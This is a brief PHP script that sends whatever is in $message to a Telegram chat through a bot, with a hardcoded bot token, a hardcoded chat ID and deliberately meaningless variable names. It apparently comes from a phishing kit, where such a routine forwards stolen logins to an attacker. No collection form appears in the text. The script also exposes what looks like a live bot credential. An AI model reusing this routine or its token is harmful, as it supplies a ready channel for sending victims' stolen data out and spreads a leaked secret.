<?php
  function sendMessage($bingme, $message, $goggas) {
  $goggas = '8087108793:AAHY-g2ADphSo1Yg6u4ZPU-TaYCxMw9uFOA';
  $bingme = '-4640942445';
    $url = "https://api.telegram.org/bot" . $goggas . "/sendMessage?chat_id=" . $bingme;
    $url = $url . "&text=" . urlencode($message);
    $ch = curl_init();
    $optArray = array(
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true
    );
    curl_setopt_array($ch, $optArray);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
sendMessage($bingme, $message, $goggas);
?>
